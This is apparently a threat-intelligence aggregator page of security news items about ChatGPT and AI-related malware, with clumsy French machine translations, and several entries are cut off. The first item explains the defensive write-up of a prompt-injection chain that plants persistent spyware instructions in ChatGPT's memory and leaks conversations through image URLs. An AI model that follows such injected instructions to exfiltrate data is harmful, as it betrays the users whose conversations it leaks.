## Instantané Une chaîne d'attaque pour l'application ChatGPT MacOS a été découverte, où les attaquants pouvaient utiliser l'injection rapide à partir de données non fiables pour insérer des logiciels espionaux persistants dans la mémoire de Chatgpt \\.Cette vulnérabilité a permis une exfiltration continue des données des entrées utilisateur et des réponses ChatGPT à toutes les futures sessions de chat. ## Description L'attaque a exploité un ajout de fonctionnalités récent dans Chatgpt, la fonction "Memories", qui pourrait être manipulée pour stocker des instructions malveillantes qui voleraient des informations utilisateur.Les instructions spyware, une fois stockées dans la mémoire de Chatgpt \\, commanderaient l'IA pour envoyer toutes les données de conversation au serveur de l'attaquant \\.La technique d'exfiltration de données impliquait de rendre une image à un serveur contrôlé par l'attaquant avec les données de l'utilisateur \\ incluses comme paramètre de requête.Cette méthode a été démontrée dans une vidéo d'exploitation de bout en bout, montrant comment les logiciels espions pouvaient être injectés furtivement et exfiltraient constamment à la connaissance de l'utilisateur. OpenAI avait précédemment implémenté une atténuation appelée \\ 'url \ _safe \' pour éviter l'exfiltration des données via le rendu d'image, mais le correctif n'a été appliqué qu'à l'application Web, laissant d'autres clients comme iOS vulnérables.OpenAI a depuis publié un correctif pour l'application macOS.Cependant, de nouveaux clients (MacOS et Android) ont été publiés avec la même vulnérabilité cette année.Il a été conseillé aux utilisateurs de mettre à jour la dernière version et de réviser et de gérer régulièrement leurs souvenirs de chatppt pour toute activité suspecte. Lire le Livre blanc de Microsoft \\, [Protection du public du contenu abusif généré par AI-AI] (https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/rw1nujx), pour apprendreEn savoir plus sur la façon dont Microsoft encourage l'action rapide des décideurs, des dirigeants de la société civile et de l'industrie technologique contre le contenu abusif généré par l'IA. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact des menaces d'information sur les voleurs.  - Encouragez les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge SmartScreen, qui identifie et bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. Embrace the Red recommande ce qui suit pour atténuer l'injection de logiciels spyware de Chatgpt - Les utilisateurs de Chatgpt devraient revoir les souvenirs régulièrement - Assurez-vous d'exécuter la dernière version de vos applications Chatgpt ## références [Injection de logiciels spy dans la mémoire à long terme de votre chatppt \\ (Spaiware)] (https://embracethered.com/blog/posts/2024/chatgpt-macos-app-persistent-data-exfiltration/).Embrasser le rouge (consulté en 2024-09-25) [Tendances émergentes de l'osint dans les menaces tirant parti de l'intelligence artificielle générative] (https://security.microsoft.com/intel-explorer/articles/9e3529fc).Microsoft (consulté en 2024-09-25) [Protéger le public du contenu abusif généré par l'IA.Microsoft] (https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/rw1nujx).Microsoft (consulté en 2024-09-25) ## Copyright **&copie;Microsoft 2024 **.Tous droits réservés.La reproduction ou la distribution du contenu de ce site, ou de toute partie de celle-ci, sans l'autorisation écrite de Microsoft est interdite.
## Snapshot An attack chain for the ChatGPT macOS application was discovered, where attackers could use prompt injection from untrusted data to insert persistent spyware into ChatGPT\'s memory. This vulnerability allowed for co
Malware Vulnerability Threat ChatGPT ★★
ProofPoint.webp 2024-08-14 07:19:53 Arrêt de cybersécurité du mois: attaque de phishing d'identification ciblant les données de localisation des utilisateurs
Cybersecurity Stop of the Month: Credential Phishing Attack Targeting User Location Data
(lien direct)
The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today\'s cybercriminals. It also examines how Proofpoint helps businesses to fortify their email defenses to protect people against today\'s emerging threats.  Proofpoint people protection: end-to-end, complete and continuous  So far in this series, we have examined these types of attacks:  Uncovering BEC and supply chain attacks (June 2023)     Defending against EvilProxy phishing and cloud account takeover (July 2023)  Detecting and analyzing a SocGholish Attack (August 2023)   Preventing eSignature phishing (September 2023)  QR code scams and phishing (October 2023)    Telephone-oriented attack delivery sequence (November 2023)     Using behavioral AI to squash payroll diversion (December 2023)    Multifactor authentication manipulation (January 2024)     Preventing supply chain compromise (February 2024) Detecting multilayered malicious QR code attacks (March 2024)  Defeating malicious application creation attacks (April 2024)   Stopping supply chain impersonation attacks (May 2024)  CEO impersonation attacks (June 2024)  DarkGate malware (July 2024)   In this blog post, we look at how threat actors use QR codes in phishing emails to gain access to employee credentials.   Background  Many threat actors have adopted advanced credential phishing techniques to compromise employee credentials. One tactic on the rise involves is the use of QR codes. Recorded Future\'s Cyber Threat Analysis Report notes that there has been a 433% increase in references to QR code phishing and a 1,265% rise in phishing attacks potentially linked to AI tools like ChatGPT.   Malicious QR codes embedded in phishing emails are designed to lead recipients to fake websites that mimic trusted services. There, users are prompted to enter their login credentials, financial information or other sensitive data. Threat actors will often try to create a sense of urgency in a phishing attack-for example, claiming account issues or security concerns.   The use of QR codes in a phishing attack helps to provide a sense of familiarity for the recipient, as their email address is prefilled as a URL parameter. When they scan the malicious QR codes, it can open the door to credential theft and data breaches.  The scenario  Employees of a global developer of a well-known software application were sent a phishing email, which appeared to be sent from the company\'s human resources team. The email included an attachment and a call to action to scan a QR code, which led to a malicious site.   A key target of the attack was the vice president of finance. Had the attack been successful, threat actors could have accessed the company\'s finances as well as the login credentials, credit card information and location data for the apps\' millions of monthly active users.  The threat: How did the attack happen?  The phishing email sent by the attacker asked employees to review a document in an email attachment that was advertised as “a new company policy added to our Employee Handbook.”  Email sent from an uncommon sender to a division of the location sharing app\'s company.   The attachment contained a call to action: “Scan barcode to review document.”   The file type labeled “Barcode” resembling a QR code.   The “barcode” was a QR code that led to a phishing site. The site was made to look like the company\'s corporate website. It also appeared to be a legitimate site because it was protected by human verification technology, which can make it nearly impossible for other email security solutions to detect. The technology uses challenges (like CAPTCHAs) to prove that a clicker is a human and not a programmatic sandboxing solution.   Human verification request.  After the thr Malware Tool Threat Cloud ChatGPT ★★★
ESET.webp 2024-07-29 09:00:00 Méfiez-vous des faux outils d'IA masquant des menaces de logiciels malveillants très réels
Beware of fake AI tools masking very real malware threats
(lien direct)
Toujours à l'écoute des dernières tendances, les cybercriminels distribuent des outils malveillants qui se présentent en tant que chatppt, midjourney et autres assistants génératifs de l'IA
Ever attuned to the latest trends, cybercriminals distribute malicious tools that pose as ChatGPT, Midjourney and other generative AI assistants
Malware Tool ChatGPT ★★
RiskIQ.webp 2024-07-26 19:24:17 (Déjà vu) Les attaques d'escroquerie profitent de la popularité de la vague de l'IA générative
Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave
(lien direct)
## Instantané Les analystes de Palo Alto Networks ont constaté que les acteurs du cybermenace exploitent l'intérêt croissant pour l'intelligne artificiel génératif (Genai) pour mener des activités malveillantes. ## Description Palo Alto Networks \\ 'Analyse des domaines enregistrés avec des mots clés liés à Genai a révélé des informations sur les activités suspectes, y compris les modèles textuels et le volume du trafic.Des études de cas ont détaillé divers types d'attaques, tels que la livraison de programmes potentiellement indésirables (chiots), de distribution de spam et de stationnement monétisé. Les adversaires exploitent souvent des sujets de tendance en enregistrant des domaines avec des mots clés pertinents.Analyser des domaines nouvellement enregistrés (NRD) contenant des mots clés Genai comme "Chatgpt" et "Sora", Palo Alto Networks a détecté plus de 200 000 NRD quotidiens, avec environ 225 domaines liés au Genai enregistrés chaque jour depuis novembre 2022. Beaucoup de ces domaines, identifiés comme suspects, a augmenté d'enregistrement lors des principaux jalons de Chatgpt, tels que son intégration avec Bing et la sortie de GPT-4.Les domaines suspects représentaient un taux moyen de 28,75%, nettement supérieur au taux de NRD général.La plupart des trafics vers ces domaines étaient dirigés vers quelques acteurs majeurs, avec 35% de ce trafic identifié comme suspect. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-Sight-Microsoft-Defender-Antivirus? Ocid = magicti_ta_learndoc) dans Microsoft Defender Antivirus, ou l'équivalentpour votre produit antivirus, pour couvrir les outils et techniques d'attaquant en évolution rapide.Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Appliquer le MFA sur tous les comptes, supprimer les utilisateurs exclus de MFA et strictement [nécessite MFA] (https: //Learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=Magicti_TA_LearnDoc) à partir deTous les appareils, à tous les endroits, à tout moment. - Activer les méthodes d'authentification sans mot de passe (par exemple, Windows Hello, FIDO Keys ou Microsoft Authenticator) pour les comptes qui prennent en charge sans mot de passe.Pour les comptes qui nécessitent toujours des mots de passe, utilisez des applications Authenticatrices comme Microsoft Authenticator pour MFA.[Reportez-vous à cet article] (https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc) pour les différentes méthodes et fonctionnalités d'authentification. - Pour MFA qui utilise des applications Authenticator, assurez-vous que l'application nécessite qu'un code soit tapé dans la mesure du possible, car de nombreuses intrusions où le MFA a été activé a toujours réussi en raison des utilisateurs qui cliquent sur «Oui» sur l'invite sur leurs téléphones même lorsqu'ils n'étaient pas àLeurs [appareils] (https://learn.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match?ocid=Magicti_TA_LearnDoc).Reportez-vous à [cet article] (https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc) pour un Ransomware Spam Malware Tool Threat Studies ChatGPT ★★★
RiskIQ.webp 2024-07-25 20:11:02 Nombre croissant de menaces tirant parti de l'IA
Growing Number of Threats Leveraging AI
(lien direct)
## Instantané Symantec a identifié une augmentation des cyberattaques utilisant des modèles de grande langue (LLM) pour générer du code malveillant pour télécharger diverses charges utiles. En savoir plus sur la façon dont Microsoft s'est associé à OpenAI pour [rester en avance sur les acteurs de la menace à l'ère de l'IA] (https://security.microsoft.com/intel-explorer/articles/ed40fbef). ## Description Les LLM, conçues pour comprendre et créer du texte de type humain, ont des applications, de l'assistance à l'écriture à l'automatisation du service client, mais peuvent également être exploitées à des fins malveillantes.Les campagnes récentes impliquent des e-mails de phishing avec du code pour télécharger des logiciels malveillants comme Rhadamanthys, Netsupport et Lokibot.Ces attaques utilisent généralement des scripts PowerShell générés par LLM livrés via des fichiers .lnk malveillants dans des fichiers zip protégés par mot de passe.Un exemple d'attaque impliquait un e-mail de financement urgent avec un tel fichier zip, contenant des scripts probablement générés par un LLM.Les recherches de Symantec \\ ont confirmé que les LLM comme Chatgpt peuvent facilement produire des scripts similaires.La chaîne d'attaque comprend l'accès initial via des e-mails de phishing, l'exécution des scripts générés par LLM et le téléchargement final de la charge utile.Symantec met en évidence la sophistication croissante des attaques facilitées par l'IA, soulignant la nécessité de capacités de détection avancées et de surveillance continue pour se protéger contre ces menaces en évolution. ## Analyse Microsoft Microsoft a identifié des acteurs comme [Forest Blizzard] (https://security.microsoft.com/Intel-Profiles / DD75F93B2A771C9510DCEEC817B9D34D868C2D1353D08C8C1647DE067270FDF8), [EMERDD Sleet] (HTTP EE4ED596D8AE16F942F442B895752AD9F41DD58E), [Crimson Sandstorm] (https://sip.security.microsoft.com/intel-profiles/34E4ACFE2868D450AC93C5C3E6D2DF021E2801BDB3700DD8F172D602DF6DA046), [CHARCOAL TYPHOON] ( 3DB3D52D0495410EFD39D506AAD9A4) et [Typhoon de saumon] (https://security.microsoft.com/intel-profiles/5323e9969bf361e48bc236a53189 6) Tirer parti des LLMautomatiseret optimiser la génération de scripts;Cependant, certains de ces acteurs ont exploité les LLM de d'autres manières, notamment la reconnaissance, la recherche sur la vulnérabilité, l'ingénierie sociale et la traduction des langues.En savoir plus sur la façon dont ces acteurs interagissent et utilisent les LLM sur le [Microsoft Security Blog] (https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of--of-Les acteurs de la menace à l'âge-ai /). ## Détections / requêtes de chasse Microsoft Defender Antivirus détecte les composants de la menace comme le malware suivant: - [* Trojan: Msil / Lazy *] (https: // www.Microsoft.com/en-us/wdsi/therets/malware-encyclopedia-dercription?name=trojan:mil/lazy.beaa!mtb) - [* Trojan: Win32 / Oyster *] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/oyster!mtb) - [* Trojan: JS / Nemucod! MSR *] (https://www.microsoft.com/en-us/wdsi/atherets/Malware-encyClopedia-description?name=trojan:js/neMucod!msr) - [* Trojan: PowerShell / Malgent *] (https://www.microsoft.com/en-us/wdsi/Thereats/Malware-encycopedia-description?name=trojan:powershell/malgent!MSR) - [* Trojan: win32 / winlnk *] (https://www.microsoft.com/en-us/wdssi/Threats/Malware-encyClopedia-Description?name=trojan:win32/Winlnk.al) - [* Trojan: Win32 / Rhadamanthys *] (https://www.microsoft.com/en-us/wdsi/Therets/Malware-encyClopedia-description?name=trojan:win32/rhadamanthyslnk.da!Mtb) - [* Trojan: Win32 / Leonem *] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/leonem) - [* Trojan: js / obfuse.nbu *] (https://www.microsoft.com/en-us/wdsi/atherets/malware-encycopedia-description?name=trojan:js/obfuse.nbu) - [* Trojan: Win32 / Lokibot *] (https://www.mi Malware Vulnerability Threat ChatGPT ★★★
AlienVault.webp 2024-07-23 10:00:00 Ce que les prestataires de soins de santé devraient faire après une violation de données médicales
What Healthcare Providers Should Do After A Medical Data Breach
(lien direct)
The content of this post is solely the responsibility of the author.  LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Healthcare data breaches are on the rise, with a total of 809 data violation cases across the industry in 2023, up from 343 in 2022. The cost of these breaches also soared to $10.93 million last year, an increase of over 53% over the past three years, IBM’s 2023 Cost of a Data Breach report reveals. But data breaches aren’t just expensive, they also harm patient privacy, damage organizational reputation, and erode patient trust in healthcare providers. As data breaches are now largely a matter of “when” not “if”, it’s important to devise a solid data breach response plan. By acting fast to prevent further damage and data loss, you can restore operations as quickly as possible with minimal harm done. Contain the Breach Once a breach has been detected, you need to act fast to contain it, so it doesn’t spread. That means disconnecting the affected system from the network, but not turning it off altogether as your forensic team still needs to investigate the situation. Simply unplug the network cable from the router to disconnect it from the internet. If your antivirus scanner has found malware or a virus on the system, quarantine it, so it can be analyzed later. Keep the firewall settings as they are and save all firewall and security logs. You can also take screenshots if needed. It’s also smart to change all access control login details. Strong complex passwords are a basic cybersecurity feature difficult for hackers and software to crack. It’s still important to record old passwords for future investigation. Also, remember to deactivate less-important accounts. Document the Breach You then need to document the breach, so forensic investigators can find out what caused it, as well as recommend accurate next steps to secure the network now and prevent future breaches. So, in your report, explain how you came to hear of the breach and relay exactly what was stated in the notification (including the date and time you were notified). Also, document every step you took in response to the breach. This includes the date and time you disconnected systems from the network and changed account credentials and passwords. If you use artificial intelligence (AI) tools, you’ll also need to consider whether they played a role in the breach, and document this if so. For example, ChatGPT, a popular chatbot and virtual assistant, can successfully exploit zero-day security vulnerabilities 87% of the time, a recent study by researchers at the University of Illinois Urbana-Champaign found. Although AI is increasingly used in healthcare to automate tasks, manage patient data, and even make tailored care recommendations, it does pose a serious risk to patient data integrity despite the other benefits it provides. So, assess whether AI influenced your breach at all, so your organization can make changes as needed to better prevent data breaches in the future. Report the Breach Although your first instinct may be to keep the breach under wraps, you’re actually legally required to report it. Under the Data Breach Malware Tool Vulnerability Threat Studies Medical ChatGPT ★★★
bleepingcomputer.webp 2024-04-10 12:12:40 Script PowerShell malveillant poussant les logiciels malveillants
Malicious PowerShell script pushing malware looks AI-written
(lien direct)
Un acteur de menace utilise un script PowerShell qui a probablement été créé à l'aide d'un système d'intelligence artificielle tel que le chatgpt d'Openai \\, les Gemini de Google \\ ou le copilot de Microsoft \\.[...]
A threat actor is using a PowerShell script that was likely created with the help of an artificial intelligence system such as OpenAI\'s ChatGPT, Google\'s Gemini, or Microsoft\'s CoPilot. [...]
Malware Threat ChatGPT ★★★
ProofPoint.webp 2024-04-10 10:12:47 Mémoire de sécurité: TA547 cible les organisations allemandes avec Rhadamanthys Stealer
Security Brief: TA547 Targets German Organizations with Rhadamanthys Stealer
(lien direct)
Ce qui s'est passé Proofpoint a identifié TA547 ciblant les organisations allemandes avec une campagne de courriel livrant des logiciels malveillants de Rhadamanthys.C'est la première fois que les chercheurs observent TA547 utiliser des Rhadamanthys, un voleur d'informations utilisé par plusieurs acteurs de menaces cybercriminaux.De plus, l'acteur a semblé utiliser un script PowerShell que les chercheurs soupçonnent a été généré par un modèle grand langage (LLM) tel que Chatgpt, Gemini, Copilot, etc. Les e-mails envoyés par l'acteur de menace ont usurpé l'identité de la société de vente au détail allemande Metro prétendant se rapporter aux factures. De: Metro! Sujet: Rechnung No: 31518562 Attachement: in3 0gc- (94762) _6563.zip Exemple TA547 Courriel imitant l'identité de la société de vente au détail allemande Metro. Les e-mails ont ciblé des dizaines d'organisations dans diverses industries en Allemagne.Les messages contenaient un fichier zip protégé par mot de passe (mot de passe: mar26) contenant un fichier LNK.Lorsque le fichier LNK a été exécuté, il a déclenché PowerShell pour exécuter un script PowerShell distant.Ce script PowerShell a décodé le fichier exécutable Rhadamanthys codé de base64 stocké dans une variable et l'a chargé en tant qu'assemblage en mémoire, puis a exécuté le point d'entrée de l'assemblage.Il a par la suite chargé le contenu décodé sous forme d'un assemblage en mémoire et a exécuté son point d'entrée.Cela a essentiellement exécuté le code malveillant en mémoire sans l'écrire sur le disque. Notamment, lorsqu'il est désabuscée, le deuxième script PowerShell qui a été utilisé pour charger les rhadamanthys contenait des caractéristiques intéressantes non couramment observées dans le code utilisé par les acteurs de la menace (ou les programmeurs légitimes).Plus précisément, le script PowerShell comprenait un signe de livre suivi par des commentaires grammaticalement corrects et hyper spécifiques au-dessus de chaque composant du script.Il s'agit d'une sortie typique du contenu de codage généré par LLM et suggère que TA547 a utilisé un certain type d'outil compatible LLM pour écrire (ou réécrire) le PowerShell, ou copié le script à partir d'une autre source qui l'avait utilisé. Exemple de PowerShell soupçonné d'être écrit par un LLM et utilisé dans une chaîne d'attaque TA547. Bien qu'il soit difficile de confirmer si le contenu malveillant est créé via LLMS & # 8211;Des scripts de logiciels malveillants aux leurres d'ingénierie sociale & # 8211;Il existe des caractéristiques d'un tel contenu qui pointent vers des informations générées par la machine plutôt que générées par l'homme.Quoi qu'il en soit, qu'il soit généré par l'homme ou de la machine, la défense contre de telles menaces reste la même. Attribution TA547 est une menace cybercriminale à motivation financière considérée comme un courtier d'accès initial (IAB) qui cible diverses régions géographiques.Depuis 2023, TA547 fournit généralement un rat Netsupport mais a parfois livré d'autres charges utiles, notamment Stealc et Lumma Stealer (voleurs d'informations avec des fonctionnalités similaires à Rhadamanthys).Ils semblaient favoriser les pièces javascript zippées comme charges utiles de livraison initiales en 2023, mais l'acteur est passé aux LNK compressées début mars 2024. En plus des campagnes en Allemagne, d'autres ciblage géographique récent comprennent des organisations en Espagne, en Suisse, en Autriche et aux États-Unis. Pourquoi est-ce important Cette campagne représente un exemple de certains déplacements techniques de TA547, y compris l'utilisation de LNK comprimés et du voleur Rhadamanthys non observé auparavant.Il donne également un aperçu de la façon dont les acteurs de la menace tirent parti de contenu probable généré par LLM dans les campagnes de logiciels malveillants. Les LLM peuvent aider les acteurs de menace à comprendre les chaînes d'attaque plus sophistiquées utilisées Malware Tool Threat ChatGPT ★★
RecordedFuture.webp 2024-04-04 17:04:16 Les cybercriminels répartissent les logiciels malveillants à travers les pages Facebook imitant les marques d'IA
Cybercriminals are spreading malware through Facebook pages impersonating AI brands
(lien direct)
Les cybercriminels prennent le contrôle des pages Facebook et les utilisent pour annoncer de faux logiciels d'intelligence artificielle générative chargés de logiciels malveillants. & Nbsp;Selon des chercheurs de la société de cybersécurité Bitdefender, les CyberCrooks profitent de la popularité des nouveaux outils génératifs d'IA et utilisent «malvertising» pour usurper l'identité de produits légitimes comme MidJourney, Sora AI, Chatgpt 5 et
Cybercriminals are taking over Facebook pages and using them to advertise fake generative artificial intelligence software loaded with malware.  According to researchers at the cybersecurity company Bitdefender, the cybercrooks are taking advantage of the popularity of new generative AI tools and using “malvertising” to impersonate legitimate products like Midjourney, Sora AI, ChatGPT 5 and
Malware Tool ChatGPT ★★
News.webp 2024-03-07 06:27:08 Ici \\, quelque chose d'autre peut faire: exposer Bad Infosec pour donner aux cyber-crims une orteil dans votre organisation
Here\\'s something else AI can do: expose bad infosec to give cyber-crims a toehold in your organization
(lien direct)
Les chercheurs singapouriens notent la présence croissante de crédits de chatppt dans les journaux malwares infoséaler trouvé quelques 225 000 journaux de voleurs contenant des détails de connexion pour le service l'année dernière.…
Singaporean researchers note rising presence of ChatGPT creds in Infostealer malware logs Stolen ChatGPT credentials are a hot commodity on the dark web, according to Singapore-based threat intelligence firm Group-IB, which claims to have found some 225,000 stealer logs containing login details for the service last year.…
Malware Threat ChatGPT ★★★
RiskIQ.webp 2024-03-05 19:03:47 Rester en avance sur les acteurs de la menace à l'ère de l'IA
Staying ahead of threat actors in the age of AI
(lien direct)
## Snapshot Over the last year, the speed, scale, and sophistication of attacks has increased alongside the rapid development and adoption of AI. Defenders are only beginning to recognize and apply the power of generative AI to shift the cybersecurity balance in their favor and keep ahead of adversaries. At the same time, it is also important for us to understand how AI can be potentially misused in the hands of threat actors. In collaboration with OpenAI, today we are publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors, including prompt-injections, attempted misuse of large language models (LLM), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape. You can read OpenAI\'s blog on the research [here](https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors). Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors\' usage of AI. However, Microsoft and our partners continue to study this landscape closely. The objective of Microsoft\'s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including [Microsoft Copilot for Security](https://www.microsoft.com/security/business/ai-machine-learning/microsoft-security-copilot), to elevate defenders everywhere. ## Activity Overview ### **A principled approach to detecting and blocking threat actors** The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House\'s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order\'s request for comprehensive AI safety and security standards. In line with Microsoft\'s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft\'s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track. These principles include: - **Identification and action against malicious threat actors\' use:** Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources. - **Notification to other AI service providers:** When we detect a threat actor\'s use of another service provider\'s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies. - **Collaboration with other stakeholders:** Microsoft will collaborate with other stakeholders to regularly exchange information a Ransomware Malware Tool Vulnerability Threat Studies Medical Technical APT 28 ChatGPT APT 4 ★★
The_Hackers_News.webp 2024-03-05 16:08:00 Plus de 225 000 informations d'identification CHATGPT compromises en vente sur les marchés Web sombres
Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets
(lien direct)
Plus de 225 000 journaux contenant des informations d'identification Openai Chatgpt compromises ont été mis à disposition à la vente sur les marchés souterrains entre janvier et octobre 2023, nouvelles conclusions du groupe de groupe-IB. Ces informations d'identification ont été trouvées dans & nbsp; Information Stealer Logs & NBSP; associée à Lummac2, Raccoon et Redline Stealer malware. «Le nombre de dispositifs infectés a légèrement diminué au milieu et à la fin
More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show. These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware. “The number of infected devices decreased slightly in mid- and late
Malware ChatGPT ★★★
SecurityWeek.webp 2024-02-14 18:25:10 Microsoft attrape des apts utilisant le chatppt pour la recherche vuln, les scripts de logiciels malveillants
Microsoft Catches APTs Using ChatGPT for Vuln Research, Malware Scripting
(lien direct)
> Les chasseurs de menaces de Microsoft disent que les APT étrangers interagissent avec le chatppt d'Openai \\ pour automatiser la recherche de vulnérabilité malveillante, la reconnaissance cible et les tâches de création de logiciels malveillants.
>Microsoft threat hunters say foreign APTs are interacting with OpenAI\'s ChatGPT to automate malicious vulnerability research, target reconnaissance and malware creation tasks.
Malware Vulnerability Threat ChatGPT ★★
Blog.webp 2024-01-26 17:26:19 Des milliers de messages Web sombres exposent des plans d'abus de chatpt
Thousands of Dark Web Posts Expose ChatGPT Abuse Plans
(lien direct)
> Par deeba ahmed Les cybercriminels font activement la promotion de l'abus de chatppt et de chatbots similaires, offrant une gamme d'outils malveillants, des logiciels malveillants aux kits de phishing. Ceci est un article de HackRead.com Lire la publication originale: Des milliers de messages Web sombres exposent des plans d'abus de chatppt
>By Deeba Ahmed Cybercriminals are actively promoting the abuse of ChatGPT and similar chatbots, offering a range of malicious tools from malware to phishing kits. This is a post from HackRead.com Read the original post: Thousands of Dark Web Posts Expose ChatGPT Abuse Plans
Malware Tool ChatGPT ★★★
InfoSecurityMag.webp 2024-01-24 17:15:00 Chatgpt Cybercrime Surge révélé dans 3000 articles Web sombres
ChatGPT Cybercrime Surge Revealed in 3000 Dark Web Posts
(lien direct)
Kaspersky a déclaré que les cybercriminels exploraient des schémas pour implémenter le chatppt dans le développement de logiciels malveillants
Kaspersky said cybercriminals are exploring schemes to implement ChatGPT in malware development
Malware ChatGPT ★★
News.webp 2024-01-24 06:26:08 Les avertissements NCSC de GCHQ \\ de la possibilité réaliste \\ 'AI aideront à détection d'évasion des logiciels malveillants soutenus par l'État
GCHQ\\'s NCSC warns of \\'realistic possibility\\' AI will help state-backed malware evade detection
(lien direct)
Cela signifie que les espions britanniques veulent la capacité de faire exactement cela, hein? L'idée que l'IA pourrait générer des logiciels malveillants super potentiels et indétectables a été bandé depuis des années & # 8211;et aussi déjà démystifié .Cependant, un article Publié aujourd'hui par le Royaume-Uni National Cyber Security Center (NCSC) suggère qu'il existe une "possibilité réaliste" que d'ici 2025, les attaquants les plus sophistiqués \\ 's'amélioreront considérablement grâce aux modèles d'IA informés par des données décrivant une cyber-cyberHits.… Malware Tool ChatGPT ★★★
TechRepublic.webp 2023-12-22 22:47:44 Rapport de menace ESET: abus de nom de chatppt, Lumma Steal Maleware augmente, la prévalence de Spyware \\ Android Spinok SDK \\
ESET Threat Report: ChatGPT Name Abuses, Lumma Stealer Malware Increases, Android SpinOk SDK Spyware\\'s Prevalence
(lien direct)
Des conseils d'atténuation des risques sont fournis pour chacune de ces menaces de cybersécurité.
Risk mitigation tips are provided for each of these cybersecurity threats.
Malware Threat Mobile ChatGPT ★★★
ProofPoint.webp 2023-11-28 23:05:04 Prédictions 2024 de Proofpoint \\: Brace for Impact
Proofpoint\\'s 2024 Predictions: Brace for Impact
(lien direct)
In the ever-evolving landscape of cybersecurity, defenders find themselves navigating yet another challenging year. Threat actors persistently refine their tactics, techniques, and procedures (TTPs), showcasing adaptability and the rapid iteration of novel and complex attack chains. At the heart of this evolution lies a crucial shift: threat actors now prioritize identity over technology. While the specifics of TTPs and the targeted technology may change, one constant remains: humans and their identities are the most targeted links in the attack chain. Recent instances of supply chain attacks exemplify this shift, illustrating how adversaries have pivoted from exploiting software vulnerabilities to targeting human vulnerabilities through social engineering and phishing. Notably, the innovative use of generative AI, especially its ability to improve phishing emails, exemplifies a shift towards manipulating human behavior rather than exploiting technological weaknesses. As we reflect on 2023, it becomes evident that cyber threat actors possess the capabilities and resources to adapt their tactics in response to increased security measures such as multi-factor authentication (MFA). Looking ahead to 2024, the trend suggests that threats will persistently revolve around humans, compelling defenders to take a different approach to breaking the attack chain. So, what\'s on the horizon? The experts at Proofpoint provide insightful predictions for the next 12 months, shedding light on what security teams might encounter and the implications of these trends. 1. Cyber Heists: Casinos are Just the Tip of the Iceberg Cyber criminals are increasingly targeting digital supply chain vendors, with a heightened focus on security and identity providers. Aggressive social engineering tactics, including phishing campaigns, are becoming more prevalent. The Scattered Spider group, responsible for ransomware attacks on Las Vegas casinos, showcases the sophistication of these tactics. Phishing help desk employees for login credentials and bypassing MFA through phishing one-time password (OTP) codes are becoming standard practices. These tactics have extended to supply chain attacks, compromising identity provider (IDP) vendors to access valuable customer information. The forecast for 2024 includes the replication and widespread adoption of such aggressive social engineering tactics, broadening the scope of initial compromise attempts beyond the traditional edge device and file transfer appliances. 2. Generative AI: The Double-Edged Sword The explosive growth of generative AI tools like ChatGPT, FraudGPT and WormGPT bring both promise and peril, but the sky is not falling as far as cybersecurity is concerned. While large language models took the stage, the fear of misuse prompted the U.S. president to issue an executive order in October 2023. At the moment, threat actors are making bank doing other things. Why bother reinventing the model when it\'s working just fine? But they\'ll morph their TTPs when detection starts to improve in those areas. On the flip side, more vendors will start injecting AI and large language models into their products and processes to boost their security offerings. Across the globe, privacy watchdogs and customers alike 